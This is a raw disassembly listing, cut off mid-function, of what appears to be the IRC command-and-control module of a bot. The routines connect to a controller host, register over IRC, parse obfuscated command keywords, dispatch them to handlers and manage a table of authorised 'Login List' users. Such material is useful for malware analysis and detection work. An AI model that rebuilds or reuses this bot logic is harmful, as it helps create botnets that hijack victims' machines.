; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C4E4 proc near ; CODE XREF: sub_41C8B1+18D�p
; sub_41C8B1+1A1�p ...
var_2710 = byte ptr -2710h
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429B60
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_2710]
push [ebp+arg_8]
push 2710h
push eax
call sub_42B8AA
add esp, 10h
lea eax, [ebp+var_2710]
push 0
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_2710]
push eax
push [ebp+arg_4]
call dword_456F8C ; send
inc eax
neg eax
sbb eax, eax
inc eax
leave
retn
sub_41C4E4 endp
; =============== S U B R O U T I N E =======================================
sub_41C534 proc near ; CODE XREF: sub_41C58F+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
jmp short loc_41C55F
; ---------------------------------------------------------------------------
loc_41C53E: ; CODE XREF: sub_41C534+2E�j
cmp [esi+8], edi
jnz short loc_41C55C
push 0Ch
call sub_42B4D7
mov [esi+8], eax
mov [eax+4], edi
mov eax, [esi+8]
pop ecx
mov [eax], edi
mov eax, [esi+8]
mov [eax+8], edi
loc_41C55C: ; CODE XREF: sub_41C534+D�j
mov esi, [esi+8]
loc_41C55F: ; CODE XREF: sub_41C534+8�j
cmp [esi+4], edi
jnz short loc_41C53E
mov eax, [esp+8+arg_8]
push [esp+8+arg_4]
mov [esi+4], eax
call sub_4293A0
inc eax
push eax
call sub_42B4D7
pop ecx
mov [esi], eax
pop ecx
push [esp+8+arg_4]
push eax
call dword_4370B4 ; lstrcpyA
pop edi
pop esi
retn 0Ch
sub_41C534 endp
; =============== S U B R O U T I N E =======================================
sub_41C58F proc near ; CODE XREF: sub_420D91+13�p
; sub_420D91+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+20h]
test eax, eax
jnz short loc_41C5C2
push 0Ch
call sub_42B4D7
mov [esi+20h], eax
and dword ptr [eax+4], 0
mov eax, [esi+20h]
pop ecx
push [esp+4+arg_4]
and dword ptr [eax], 0
mov eax, [esi+20h]
push [esp+8+arg_0]
and dword ptr [eax+8], 0
push dword ptr [esi+20h]
jmp short loc_41C5CB
; ---------------------------------------------------------------------------
loc_41C5C2: ; CODE XREF: sub_41C58F+8�j
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
loc_41C5CB: ; CODE XREF: sub_41C58F+31�j
mov ecx, esi
call sub_41C534
pop esi
retn 8
sub_41C58F endp
; =============== S U B R O U T I N E =======================================
sub_41C5D6 proc near ; CODE XREF: sub_418D86+36AC�p
; sub_41C5D6+D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+8]
test eax, eax
jz short loc_41C5E8
push eax
call sub_41C5D6
loc_41C5E8: ; CODE XREF: sub_41C5D6+A�j
mov eax, [esi]
test eax, eax
jz short loc_41C5F5
push eax
call sub_4290D0
pop ecx
loc_41C5F5: ; CODE XREF: sub_41C5D6+16�j
push esi
call sub_4290D0
pop ecx
pop esi
retn 4
sub_41C5D6 endp
; =============== S U B R O U T I N E =======================================
sub_41C600 proc near ; CODE XREF: sub_42045F+23E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
mov eax, offset dword_4584B0
loc_41C608: ; CODE XREF: sub_41C600+18�j
cmp byte ptr [eax], 0
jz short loc_41C621
add eax, 0BFh
inc ebx
cmp eax, offset byte_4586ED
jl short loc_41C608
or eax, 0FFFFFFFFh
loc_41C61D: ; CODE XREF: sub_41C600+5C�j
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_41C621: ; CODE XREF: sub_41C600+B�j
push esi
mov esi, ebx
imul esi, 0BFh
push edi
mov edi, dword_4370B4
push [esp+0Ch+arg_0]
lea eax, dword_4584B0[esi]
push eax
call edi ; dword_4370B4
push [esp+0Ch+arg_4]
lea eax, dword_4584C0[esi]
push eax
call edi ; dword_4370B4
push [esp+0Ch+arg_8]
lea eax, dword_4584D0[esi]
push eax
call edi ; dword_4370B4
pop edi
mov eax, ebx
pop esi
jmp short loc_41C61D
sub_41C600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C65E proc near ; CODE XREF: sub_40A9FE+9B0�p
; sub_41CBC1+C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, dword_437178
push edi
mov [ebp+var_4], ecx
xor ebx, ebx
mov edi, offset dword_4584B0
loc_41C675: ; CODE XREF: sub_41C65E+4D�j
cmp byte ptr [edi], 0
jz short loc_41C69E
push [ebp+arg_0]
push edi
call esi ; dword_437178
test eax, eax
jnz short loc_41C69E
push [ebp+arg_4]
lea eax, [edi+10h]
push eax
call esi ; dword_437178
test eax, eax
jnz short loc_41C69E
push [ebp+arg_8]
lea eax, [edi+20h]
push eax
call esi ; dword_437178
test eax, eax
jz short loc_41C6B7
loc_41C69E: ; CODE XREF: sub_41C65E+1A�j
; sub_41C65E+24�j ...
add edi, 0BFh
inc ebx
cmp edi, offset byte_4586ED
jl short loc_41C675
or eax, 0FFFFFFFFh
loc_41C6B0: ; CODE XREF: sub_41C65E+64�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_41C6B7: ; CODE XREF: sub_41C65E+3E�j
mov ecx, [ebp+var_4]
push ebx
call sub_41C704
mov eax, ebx
jmp short loc_41C6B0
sub_41C65E endp
; =============== S U B R O U T I N E =======================================
sub_41C6C4 proc near ; CODE XREF: sub_418D70+36A1�p
; sub_41C8B1+B8�p
push esi
mov esi, offset dword_4584C0
loc_41C6CA: ; CODE XREF: sub_41C6C4+3C�j
push 10h
lea eax, [esi-10h]
push 0
push eax
call sub_429760
push 10h
push 0
push esi
call sub_429760
push 9Fh
lea eax, [esi+10h]
push 0
push eax
call sub_429760
add esi, 0BFh
add esp, 24h
cmp esi, (offset dword_4586FC+1)
jl short loc_41C6CA
pop esi
retn
sub_41C6C4 endp
; =============== S U B R O U T I N E =======================================
sub_41C704 proc near ; CODE XREF: sub_40A9FE+8C5�p
; sub_41C65E+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
imul esi, 0BFh
lea eax, dword_4584B0[esi]
cmp byte ptr [eax], 0
jz short loc_41C74F
push 10h
push 0
push eax
call sub_429760
push 10h
lea eax, dword_4584C0[esi]
push 0
push eax
call sub_429760
push 9Fh
lea eax, dword_4584D0[esi]
push 0
push eax
call sub_429760
xor eax, eax
add esp, 24h
inc eax
jmp short loc_41C751
; ---------------------------------------------------------------------------
loc_41C74F: ; CODE XREF: sub_41C704+14�j
xor eax, eax
loc_41C751: ; CODE XREF: sub_41C704+49�j
pop esi
retn 4
sub_41C704 endp
; =============== S U B R O U T I N E =======================================
sub_41C755 proc near ; CODE XREF: sub_41CBC1+AE�p
; sub_42045F+C7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, dword_437178
push edi
mov edi, offset dword_4584B0
loc_41C762: ; CODE XREF: sub_41C755+45�j
cmp byte ptr [edi], 0
jz short loc_41C78E
push [esp+8+arg_0]
push edi
call esi ; dword_437178
test eax, eax
jnz short loc_41C78E
push [esp+8+arg_4]
lea eax, [edi+10h]
push eax
call esi ; dword_437178
test eax, eax
jnz short loc_41C78E
push [esp+8+arg_8]
lea eax, [edi+20h]
push eax
call esi ; dword_437178
test eax, eax
jz short loc_41C7A3
loc_41C78E: ; CODE XREF: sub_41C755+10�j
; sub_41C755+1B�j ...
add edi, 0BFh
cmp edi, offset byte_4586ED
jl short loc_41C762
xor eax, eax
loc_41C79E: ; CODE XREF: sub_41C755+51�j
pop edi
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_41C7A3: ; CODE XREF: sub_41C755+37�j
xor eax, eax
inc eax
jmp short loc_41C79E
sub_41C755 endp
; =============== S U B R O U T I N E =======================================
sub_41C7A8 proc near ; CODE XREF: sub_42045F+134�p
; sub_42045F+1F3�p ...
mov eax, offset dword_4584B0
loc_41C7AD: ; CODE XREF: sub_41C7A8+14�j
cmp byte ptr [eax], 0
jnz short loc_41C7C1
add eax, 0BFh
cmp eax, offset byte_4586ED
jl short loc_41C7AD
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C7C1: ; CODE XREF: sub_41C7A8+8�j
xor eax, eax
inc eax
retn
sub_41C7A8 endp
; =============== S U B R O U T I N E =======================================
sub_41C7C5 proc near ; CODE XREF: sub_40A9FE+A18�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov edi, ecx
push offset aSLoginList ; "%s Login List:"
push ebp
push edi
call sub_41CE4A
add esp, 10h
xor ebx, ebx
mov esi, offset dword_4584B0
loc_41C7EA: ; CODE XREF: sub_41C7C5+62�j
cmp byte ptr [esi], 0
jz short loc_41C80A
lea eax, [esi+10h]
lea ecx, [eax+10h]
push ecx
push eax
push esi
push ebx
push offset aISS@S ; "<%i> %s!%s@%s"
push ebp
push edi
call sub_41CE4A
add esp, 1Ch
jmp short loc_41C81A
; ---------------------------------------------------------------------------
loc_41C80A: ; CODE XREF: sub_41C7C5+28�j
push ebx
push offset aIEmpty ; "<%i> <Empty>"
push ebp
push edi
call sub_41CE4A
add esp, 10h
loc_41C81A: ; CODE XREF: sub_41C7C5+43�j
add esi, 0BFh
inc ebx
cmp esi, offset byte_4586ED
jl short loc_41C7EA
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSLoginListComp ; "%s Login List complete."
push ebp
push edi
call sub_41CE4A
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_41C7C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C844 proc near ; CODE XREF: sub_42045F+15C�p
; sub_42045F+510�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429B60
push ebx
mov ebx, [ebp+arg_0]
cmp byte ptr [ebx+4], 0
jnz short loc_41C860
xor eax, eax
inc eax
jmp short loc_41C8AE
; ---------------------------------------------------------------------------
loc_41C860: ; CODE XREF: sub_41C844+15�j
push esi
lea eax, [ebp+arg_8]
push edi
push eax
push [ebp+arg_4]
lea eax, [ebp+var_2710]
xor edi, edi
push 2710h
push eax
call sub_42B8AA
add esp, 10h
mov esi, offset dword_4584B0
loc_41C884: ; CODE XREF: sub_41C844+64�j
cmp byte ptr [esi], 0
jz short loc_41C89C
lea eax, [ebp+var_2710]
push eax
push esi
push ebx
call sub_41CDD4
add esp, 0Ch
add edi, eax
loc_41C89C: ; CODE XREF: sub_41C844+43�j
add esi, 0BFh
cmp esi, offset byte_4586ED
jl short loc_41C884
mov eax, edi
pop edi
pop esi
loc_41C8AE: ; CODE XREF: sub_41C844+1A�j
pop ebx
leave
retn
sub_41C844 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C8B1 proc near ; CODE XREF: sub_418FA1+616�p
var_3C = qword ptr -3Ch
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_1C = qword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push esi
mov esi, ecx
push edi
cmp byte ptr [esi+4], 0
jz short loc_41C8C9
xor eax, eax
inc eax
jmp loc_41CA7C
; ---------------------------------------------------------------------------
loc_41C8C9: ; CODE XREF: sub_41C8B1+E�j
cmp dword_457050, 0
jnz short loc_41C8EF
loc_41C8D2: ; CODE XREF: sub_41C8B1+3C�j
lea eax, [ebp+var_4]
push 0
push eax
call dword_456E38 ; InternetGetConnectedState
test eax, eax
jnz short loc_41C8EF
push 4E20h
call dword_437190 ; Sleep
jmp short loc_41C8D2
; ---------------------------------------------------------------------------
loc_41C8EF: ; CODE XREF: sub_41C8B1+1F�j
; sub_41C8B1+2F�j
xor edi, edi
push 6
inc edi
push edi
push 2
call dword_456FD0 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_41C952
push [ebp+arg_0]
call dword_456FD4 ; gethostbyname
test eax, eax
jz short loc_41C94A
mov eax, [eax+0Ch]
push 4
push dword ptr [eax]
lea eax, [ebp+var_28]
push eax
call sub_429420
add esp, 0Ch
mov [ebp+var_2C], 2
push [ebp+arg_4]
call dword_456F38 ; ntohs
mov [ebp+var_2A], ax
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41C959
loc_41C94A: ; CODE XREF: sub_41C8B1+5E�j
push dword ptr [esi]
call dword_456FF0 ; closesocket
loc_41C952: ; CODE XREF: sub_41C8B1+51�j
mov eax, edi
jmp loc_41CA7C
; ---------------------------------------------------------------------------
loc_41C959: ; CODE XREF: sub_41C8B1+97�j
push ebx
mov ebx, dword_437188
call ebx ; dword_437188
mov ecx, esi
mov dword_4584AC, eax
call sub_41C6C4
lea eax, [ebp+var_14]
push eax
call dword_4370D0 ; QueryPerformanceCounter
lea eax, [ebp+var_C]
push eax
call dword_43718C ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_10], eax
jl short loc_41C9C9
jg short loc_41C990
cmp [ebp+var_14], eax
jbe short loc_41C9C9
loc_41C990: ; CODE XREF: sub_41C8B1+D8�j
cmp [ebp+var_8], eax
jl short loc_41C9C9
jg short loc_41C99C
cmp [ebp+var_C], eax
jbe short loc_41C9C9
loc_41C99C: ; CODE XREF: sub_41C8B1+E4�j
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
call sub_42B2F0
mov dword ptr [ebp+var_1C], eax
mov dword ptr [ebp+var_1C+4], edx
fild [ebp+var_1C]
push ecx
push ecx ; double
fstp [esp+3Ch+var_3C]
call sub_42A706
pop ecx
pop ecx
call sub_42A9E0
jmp short loc_41C9CB
; ---------------------------------------------------------------------------
loc_41C9C9: ; CODE XREF: sub_41C8B1+D6�j
; sub_41C8B1+DD�j ...
call ebx ; dword_437188
loc_41C9CB: ; CODE XREF: sub_41C8B1+116�j
mov dword_457F60, eax
call ebx ; dword_437188
push [ebp+arg_8]
mov dword_4584AC, eax
mov byte ptr [esi+4], 1
call sub_4293A0
inc eax
push eax
call sub_42B4D7
mov edi, dword_4370B4
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+arg_8]
push eax
call edi ; dword_4370B4
push [ebp+arg_C]
call sub_4293A0
inc eax
push eax
call sub_42B4D7
pop ecx
mov [esi+0Ch], eax
pop ecx
push [ebp+arg_10]
push eax
call edi ; dword_4370B4
cmp [ebp+arg_14], 0
mov edi, offset aSS ; "%s %s\r\n"
jz short loc_41CA46
push offset byte_454A54
push [ebp+arg_14]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_41CA46
push [ebp+arg_14]
push offset a7lybp1gunfm0 ; "7LybP1GuNfm0"
push edi
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 14h
loc_41CA46: ; CODE XREF: sub_41C8B1+16D�j
; sub_41C8B1+17F�j
push [ebp+arg_8]
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push edi
push dword ptr [esi]
push esi
call sub_41C4E4
push [ebp+arg_10]
push [ebp+arg_C]
push offset a391myLxl28_ ; "391mY/LxL28."
push offset aSS0S ; "%s %s * 0 :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 2Ch
call ebx ; dword_437188
mov dword_4584AC, eax
xor eax, eax
pop ebx
loc_41CA7C: ; CODE XREF: sub_41C8B1+13�j
; sub_41C8B1+A3�j
pop edi
pop esi
leave
retn 18h
sub_41C8B1 endp
; =============== S U B R O U T I N E =======================================
sub_41CA82 proc near ; CODE XREF: sub_40A9FE+B4A�p
; sub_4182BA+67B�p ...
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_41CAB2
push offset a___ ; "..."
push esi
call sub_41CAB4
pop ecx
and byte ptr [esi+4], 0
and byte ptr [esi+5], 0
pop ecx
push 2
push dword ptr [esi]
call dword_456FE8 ; shutdown
push dword ptr [esi]
call dword_456FF0 ; closesocket
loc_41CAB2: ; CODE XREF: sub_41CA82+7�j
pop esi
retn
sub_41CA82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAB4 proc near ; CODE XREF: sub_40A9FE+B38�p
; sub_4182BA+66A�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429B60
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_41CB25
cmp [ebp+arg_4], 0
jz short loc_41CB07
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_2710]
push [ebp+arg_4]
push 2710h
push eax
call sub_42B8AA
lea eax, [ebp+var_2710]
push eax
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push offset aSS ; "%s %s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 24h
jmp short loc_41CB1C
; ---------------------------------------------------------------------------
loc_41CB07: ; CODE XREF: sub_41CAB4+1B�j
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push offset aS_6 ; "%s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 10h
loc_41CB1C: ; CODE XREF: sub_41CAB4+51�j
test eax, eax
jz short loc_41CB25
xor eax, eax
inc eax
jmp short loc_41CB27
; ---------------------------------------------------------------------------
loc_41CB25: ; CODE XREF: sub_41CAB4+15�j
; sub_41CAB4+6A�j
xor eax, eax
loc_41CB27: ; CODE XREF: sub_41CAB4+6F�j
pop esi
leave
retn
sub_41CAB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB2A proc near ; CODE XREF: sub_418FA1+61D�p
var_400 = byte ptr -400h
push ebp
mov ebp, esp
sub esp, 400h
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_41CB86
push edi
loc_41CB3D: ; CODE XREF: sub_41CB2A+55�j
push 0
lea eax, [ebp+var_400]
push 3FFh
push eax
push dword ptr [esi]
call dword_456F58 ; recv
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41CB81
test edi, edi
jz short loc_41CB81
call dword_437188 ; GetTickCount
and [ebp+edi+var_400], 0
mov dword_4584AC, eax
lea eax, [ebp+var_400]
mov ecx, esi
push eax
call sub_41CB8C
jmp short loc_41CB3D
; ---------------------------------------------------------------------------
loc_41CB81: ; CODE XREF: sub_41CB2A+2E�j
; sub_41CB2A+32�j
and byte ptr [esi+4], 0
pop edi
loc_41CB86: ; CODE XREF: sub_41CB2A+10�j
xor eax, eax
pop esi
inc eax
leave
retn
sub_41CB2A endp
; =============== S U B R O U T I N E =======================================
sub_41CB8C proc near ; CODE XREF: sub_41CB2A+50�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
mov ebp, ecx
mov ebx, offset asc_4476D0 ; "\r\n"
jmp short loc_41CBAB
; ---------------------------------------------------------------------------
loc_41CB9D: ; CODE XREF: sub_41CB8C+2C�j
and byte ptr [esi], 0
push edi
mov ecx, ebp
call sub_41CBC1
lea edi, [esi+2]
loc_41CBAB: ; CODE XREF: sub_41CB8C+F�j
push ebx
push edi
call sub_42AEA0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_41CB9D
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_41CB8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CBC1 proc near ; CODE XREF: sub_41CB8C+17�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
cmp byte ptr [eax], 3Ah
push edi
mov [ebp+var_4], ecx
mov [ebp+var_8], ebx
push 20h
jnz loc_41CD3A
lea esi, [eax+1]
push esi
call sub_42B1A0
pop ecx
cmp eax, ebx
pop ecx
jz loc_41CD97
mov [eax], bl
inc eax
push 20h
push eax
mov [ebp+arg_0], eax
call sub_42B1A0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_41CC0C
mov [edi], bl
inc edi
loc_41CC0C: ; CODE XREF: sub_41CBC1+46�j
push 21h
push esi
mov [ebp+var_14], esi
call sub_42B1A0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_10], eax
jz short loc_41CC3D
mov [eax], bl
inc [ebp+var_10]
push 40h
push [ebp+var_10]
call sub_42B1A0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
jz short loc_41CC3D
mov [eax], bl
inc [ebp+var_C]
loc_41CC3D: ; CODE XREF: sub_41CBC1+5D�j
; sub_41CBC1+75�j
mov esi, dword_437178
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jz loc_41CD30
push offset aYjmlc1btsf10_0 ; "yJmlc1btsF10"
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jnz short loc_41CC92
loc_41CC63: ; CODE XREF: sub_41CBC1+DD�j
push [ebp+var_C]
mov ecx, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_14]
call sub_41C755
test eax, eax
jz loc_41CD30
push [ebp+var_C]
mov ecx, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_14]
call sub_41C65E
jmp loc_41CD30
; ---------------------------------------------------------------------------
loc_41CC92: ; CODE XREF: sub_41CBC1+A0�j
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jz short loc_41CC63
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jnz short loc_41CCC6
push 20h
push edi
mov [ebp+var_8], edi
call sub_42B1A0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_41CCC3
loc_41CCC1: ; CODE XREF: sub_41CBC1+12A�j
mov [edi], bl
loc_41CCC3: ; CODE XREF: sub_41CBC1+FE�j
inc edi
jmp short loc_41CD30
; ---------------------------------------------------------------------------
loc_41CCC6: ; CODE XREF: sub_41CBC1+EB�j
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jnz short loc_41CCED
push 20h
push edi
mov [ebp+var_8], edi
call sub_42B1A0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_41CD97
jmp short loc_41CCC1
; ---------------------------------------------------------------------------
loc_41CCED: ; CODE XREF: sub_41CBC1+111�j
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jnz short loc_41CD30
mov eax, [ebp+var_4]
push dword ptr [eax+8]
push [ebp+var_14]
call esi ; dword_437178
test eax, eax
jnz short loc_41CD30
mov esi, [ebp+var_4]
push dword ptr [esi+8]
call sub_4290D0
push edi
call sub_4293A0
inc eax
push eax
call sub_42B4D7
add esp, 0Ch
mov [esi+8], eax
push edi
push eax
call dword_4370B4 ; lstrcpyA
loc_41CD30: ; CODE XREF: sub_41CBC1+8E�j
; sub_41CBC1+B5�j ...
lea eax, [ebp+var_14]
push eax
push edi
push [ebp+arg_0]
jmp short loc_41CD8F
; ---------------------------------------------------------------------------
loc_41CD3A: ; CODE XREF: sub_41CBC1+19�j
push eax
mov edi, eax
call sub_42B1A0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41CD97
push offset dword_445B50
push edi
mov [eax], bl
lea esi, [eax+1]
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_41CD7D
cmp esi, ebx
jz short loc_41CD97
mov eax, [ebp+var_4]
inc esi
push esi
push offset dword_445B60
push offset aSS ; "%s %s\r\n"
push dword ptr [eax]
push eax
call sub_41C4E4
add esp, 14h
jmp short loc_41CD97
; ---------------------------------------------------------------------------
loc_41CD7D: ; CODE XREF: sub_41CBC1+19A�j
lea eax, [ebp+var_14]
mov [ebp+var_C], ebx
push eax
push esi
mov [ebp+var_10], ebx
mov [ebp+var_14], ebx
mov [ebp+var_8], ebx
push edi
loc_41CD8F: ; CODE XREF: sub_41CBC1+177�j
mov ecx, [ebp+var_4]
call sub_41CD9E
loc_41CD97: ; CODE XREF: sub_41CBC1+2C�j
; sub_41CBC1+124�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_41CBC1 endp
; =============== S U B R O U T I N E =======================================
sub_41CD9E proc near ; CODE XREF: sub_41CBC1+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, ecx
mov esi, [edi+20h]
jmp short loc_41CDBA
; ---------------------------------------------------------------------------
loc_41CDA7: ; CODE XREF: sub_41CD9E+1E�j
push [esp+8+arg_0]
push dword ptr [esi]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_41CDC0
mov esi, [esi+8]
loc_41CDBA: ; CODE XREF: sub_41CD9E+7�j
test esi, esi
jnz short loc_41CDA7
jmp short loc_41CDCF
; ---------------------------------------------------------------------------
loc_41CDC0: ; CODE XREF: sub_41CD9E+17�j
push edi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
call dword ptr [esi+4]
add esp, 0Ch
loc_41CDCF: ; CODE XREF: sub_41CD9E+20�j
pop edi
pop esi
retn 0Ch
sub_41CD9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CDD4 proc near ; CODE XREF: .text:00401976�p
; sub_401990:loc_401A6D�p ...
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429B60
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41CDF0
xor eax, eax
inc eax
jmp short loc_41CE47
; ---------------------------------------------------------------------------
loc_41CDF0: ; CODE XREF: sub_41CDD4+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_2710]
push [ebp+arg_8]
push 2710h
push eax
call sub_42B8AA
lea eax, [ebp+var_2710]
push eax
push offset dword_443EB0
call sub_415603
lea eax, [ebp+var_2710]
push eax
push [ebp+arg_4]
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 30h
mov esi, eax
push 3E8h
call dword_437190 ; Sleep
mov eax, esi
loc_41CE47: ; CODE XREF: sub_41CDD4+1A�j
pop esi
leave
retn
sub_41CDD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE4A proc near ; CODE XREF: .text:00401944�p
; sub_401990:loc_401A66�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429B60
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41CE66
xor eax, eax
inc eax
jmp short loc_41CEBD
; ---------------------------------------------------------------------------
loc_41CE66: ; CODE XREF: sub_41CE4A+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_8]
push 26F6h
push eax
call sub_42B8AA
lea eax, [ebp+var_26F8]
push eax
push offset dword_443EB0
call sub_415603
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 30h
mov esi, eax
push 3E8h
call dword_437190 ; Sleep
mov eax, esi
loc_41CEBD: ; CODE XREF: sub_41CE4A+1A�j
pop esi
leave
retn
sub_41CE4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEC0 proc near ; CODE XREF: sub_40A9FE+5411�p
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429B60
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_41CEDC
xor eax, eax
inc eax
jmp short loc_41CF22
; ---------------------------------------------------------------------------
loc_41CEDC: ; CODE XREF: sub_41CEC0+15�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_8]
push 26F6h
push eax
call sub_42B8AA
